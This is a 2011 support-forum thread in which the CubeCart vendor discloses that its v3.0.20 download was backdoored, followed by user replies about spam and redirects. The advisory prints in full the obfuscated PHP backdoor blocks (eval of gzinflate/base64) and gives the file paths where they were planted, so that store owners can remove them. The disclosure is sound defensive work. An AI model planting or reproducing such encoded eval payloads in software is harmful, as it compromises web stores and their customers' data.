Al Brookbanks Posted February 8, 2011 Share Posted February 8, 2011 Over the last week it has been bought to our attention that a number of CubeCart v3 stores have been hacked. After careful examination it became apparent that the 3.0.20 zip file that was hosted on our server had been compromised. Someone had modified this zip file to include a number of pieced of malicious code into a handful of the files.... We expect that the file was compromised from around November 2010 but we can't be sure. As from today the package has been cleaned up and given an MD5 checksum which can be used to verify it in the future. SInce November our server underwent some software upgrades to achieve PCI compliance and our helpdesk software managing the package has been upgraded. For this reason we are fairly confident any backdoors have been closed and the file should not be tampered with again. If you installed CubeCart v3 onto your web hosting account by downloading it from our server please check the following pieces of code are removed from your store if present: Remove the file: images/random/chars/T.php Open the file below (if it exists) and remove the following code from around line 319: install/index.php <?php eval (gzinflate(base64_decode( 'lVZdc6JIFP0rW6l9mHlD0FEqk001oEgTPpQPgZctoB1AQDpi0sKvX/BrIGMl64NV' .'on1Pn3vuuad4/ufnM47xX38XTw8LAIBWx0zAhKpEw1cvH+1gXWwlYIBAzAoklmBq' .'oQiYU+yJ8askEBVIYOPnkEKiF7mRFAeMWqOaKuQGS+JDDCvVtafQtixoOzynW4QD' .'1gC5JhVbVsX5wMXWcmZr9kDhgB3DZYp5aVZMI5FNvFxNkLOYRouGQTqSFwleApV7' .'88WUhbWL1QpwCz7NVowd+IbFr/kUStNl4Ttq4jfNhBU2f21RohuodrdsLYts7WcA' .'+OTlHZKXV7TyMBJnCTIw76+WBQDcJsizqDlPh3lcu7nyihj7DVAcDmkv82lpCsmP' .'+OXACXIVRgsxijQAdpBMMiCDlyU/nAhmNHp4XL/72bfAL9c/hv+idVig9bcHKB7K' .'QKCIRtu0uyKFm89qz3Qph15mLs2mnhElRoqGIQ3n67maLJmGQfs84ExPzLzVdFSa' .'OTa8DM/tHCdKBktji2vdkLBslmkgElYR9hnKZ6XML8ugve/y4W9iM5pVVJqT+Qta' .'YaQkxVp1qtNNMIbnWt1Uxp7jxQ1G2sMUSSGleI7qTL5y7eAblGqgdG+FNZXIRnrF' .'O/Esr1i68QG3vWdWHhwjnehChOWq30vb26qGSDbv6vX43HJVqCFx6cEwECF26/AD' .'t+OMDuqm7HAirJRIYy9nK/nKm0x6NWc9oEgaDbOxv3KLD5iswme/7xGo/v/H2kNw' .'+U2u9k1/ZKLxHW58yX5dU/a01M0prTED7CW/NYYbbqgJgFz5/E8u6oVLw+Oj5seZ' .'XOY0o7C+GVLNfK73ys7Jn5/W8eWumXmuzCPiJelOqfd5wEhnbh3PCKTFOutCdnKV' .'dnsOOj7bnb8j3ejcO+toxFMnfmcOTle/s96NflkwV7N1e+bOuck1dcvbFw/t5AGF' .'5bqZEe29h5cZtRlx2cNWL6H8or8jzqfeaHS97nars9bZqRNHMv7lnPrs4qy655re' .'ejrenl/H42TS+K+/Wzy1b/W8c2+nijjylDwe9fPu4ot7cmBBfJsbGY59M7PcVN0q' .'6QD7t3Lhyxwg45PPuxyG7B850c/RnnecZjcVIcT3aaRQmoX/zDrm0x4Fn7Ghv4mx' .'yYTsSdNbOjZ5Rp6eHr5/f9yt92+77eNz88LwHw==' ))); ?> Open the files below and remove the following code from the top: includes/boxes/siteDocs.inc.php language/nl/lang.inc.php <?php eval (gzinflate(base64_decode( 's7ezsS/IKFBwKEgsLi7JKCrVUIl3dw2JVi/OzcxJVY/VtLa34+WCqsnMS84pTUnF' .'pyS1LDEHi7yNPQA=' ))); ?> We sincerely apologise for any inconvenience that this may have caused. Quote Link to comment Share on other sites More sharing options...
Guest blackerutuf Posted March 29, 2011 Share Posted March 29, 2011 I have been having problems with th eversion 3.0.10, where someone has been sending mass emails on my account, has anyone else had similar problems and been able to overcome it? Quote Link to comment Share on other sites More sharing options...
Robsta Posted April 1, 2011 Share Posted April 1, 2011 I have been having problems with th eversion 3.0.10, where someone has been sending mass emails on my account, has anyone else had similar problems and been able to overcome it? Disable tell-a-friend, or enable Flood Control. You really should upgrade to the latest release of v3 before it's discontinued. Quote Link to comment Share on other sites More sharing options...
Guest v3lady Posted September 4, 2011 Share Posted September 4, 2011 Over the last week it has been bought to our attention that a number of CubeCart v3 stores have been hacked. After careful examination it became apparent that the 3.0.20 zip file that was hosted on our server had been compromised. Someone had modified this zip file to include a number of pieced of malicious code into a handful of the files.... We expect that the file was compromised from around November 2010 but we can't be sure. As from today the package has been cleaned up and given an MD5 checksum which can be used to verify it in the future. SInce November our server underwent some software upgrades to achieve PCI compliance and our helpdesk software managing the package has been upgraded. For this reason we are fairly confident any backdoors have been closed and the file should not be tampered with again. If you installed CubeCart v3 onto your web hosting account by downloading it from our server please check the following pieces of code are removed from your store if present: Remove the file: images/random/chars/T.php Open the file below (if it exists) and remove the following code from around line 319: install/index.php <?php eval (gzinflate(base64_decode( 'lVZdc6JIFP0rW6l9mHlD0FEqk001oEgTPpQPgZctoB1AQDpi0sKvX/BrIGMl64NV' .'on1Pn3vuuad4/ufnM47xX38XTw8LAIBWx0zAhKpEw1cvH+1gXWwlYIBAzAoklmBq' .'oQiYU+yJ8askEBVIYOPnkEKiF7mRFAeMWqOaKuQGS+JDDCvVtafQtixoOzynW4QD' .'1gC5JhVbVsX5wMXWcmZr9kDhgB3DZYp5aVZMI5FNvFxNkLOYRouGQTqSFwleApV7' .'88WUhbWL1QpwCz7NVowd+IbFr/kUStNl4Ttq4jfNhBU2f21RohuodrdsLYts7WcA' .'+OTlHZKXV7TyMBJnCTIw76+WBQDcJsizqDlPh3lcu7nyihj7DVAcDmkv82lpCsmP' .'+OXACXIVRgsxijQAdpBMMiCDlyU/nAhmNHp4XL/72bfAL9c/hv+idVig9bcHKB7K' .'QKCIRtu0uyKFm89qz3Qph15mLs2mnhElRoqGIQ3n67maLJmGQfs84ExPzLzVdFSa' .'OTa8DM/tHCdKBktji2vdkLBslmkgElYR9hnKZ6XML8ugve/y4W9iM5pVVJqT+Qta' .'YaQkxVp1qtNNMIbnWt1Uxp7jxQ1G2sMUSSGleI7qTL5y7eAblGqgdG+FNZXIRnrF' .'O/Esr1i68QG3vWdWHhwjnehChOWq30vb26qGSDbv6vX43HJVqCFx6cEwECF26/AD' .'t+OMDuqm7HAirJRIYy9nK/nKm0x6NWc9oEgaDbOxv3KLD5iswme/7xGo/v/H2kNw' .'+U2u9k1/ZKLxHW58yX5dU/a01M0prTED7CW/NYYbbqgJgFz5/E8u6oVLw+Oj5seZ' .'XOY0o7C+GVLNfK73ys7Jn5/W8eWumXmuzCPiJelOqfd5wEhnbh3PCKTFOutCdnKV' .'dnsOOj7bnb8j3ejcO+toxFMnfmcOTle/s96NflkwV7N1e+bOuck1dcvbFw/t5AGF' .'5bqZEe29h5cZtRlx2cNWL6H8or8jzqfeaHS97nars9bZqRNHMv7lnPrs4qy655re' .'ejrenl/H42TS+K+/Wzy1b/W8c2+nijjylDwe9fPu4ot7cmBBfJsbGY59M7PcVN0q' .'6QD7t3Lhyxwg45PPuxyG7B850c/RnnecZjcVIcT3aaRQmoX/zDrm0x4Fn7Ghv4mx' .'yYTsSdNbOjZ5Rp6eHr5/f9yt92+77eNz88LwHw==' ))); ?> Open the files below and remove the following code from the top: includes/boxes/siteDocs.inc.php language/nl/lang.inc.php <?php eval (gzinflate(base64_decode( 's7ezsS/IKFBwKEgsLi7JKCrVUIl3dw2JVi/OzcxJVY/VtLa34+WCqsnMS84pTUnF' .'pyS1LDEHi7yNPQA=' ))); ?> We sincerely apologise for any inconvenience that this may have caused. Hi, Ive just discovered that I have this problem and I've apllied all the amends above. However my "forgot passsword" code still leads directly to fbi.gov. Any clues? Quote Link to comment Share on other sites More sharing options...
detectorman Posted September 9, 2011 Share Posted September 9, 2011 Hi All, Sorry to ask this but I cannot see the v3.0.20 download link in my dashboard. Is this version still available for download? Thanks Dave Quote Link to comment Share on other sites More sharing options...
Robsta Posted September 9, 2011 Share Posted September 9, 2011 Hi All, Sorry to ask this but I cannot see the v3.0.20 download link in my dashboard. Is this version still available for download? Thanks Dave No, it's been discontinued. Quote Link to comment Share on other sites More sharing options...
gypsy1968 Posted January 7, 2012 Share Posted January 7, 2012 At this stage, if I am ok thus far do I need to upgrade? I did have a challenge where mass emails were being sent and my host disabled the tell-a-friend mod but we had not known about this. thanks! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.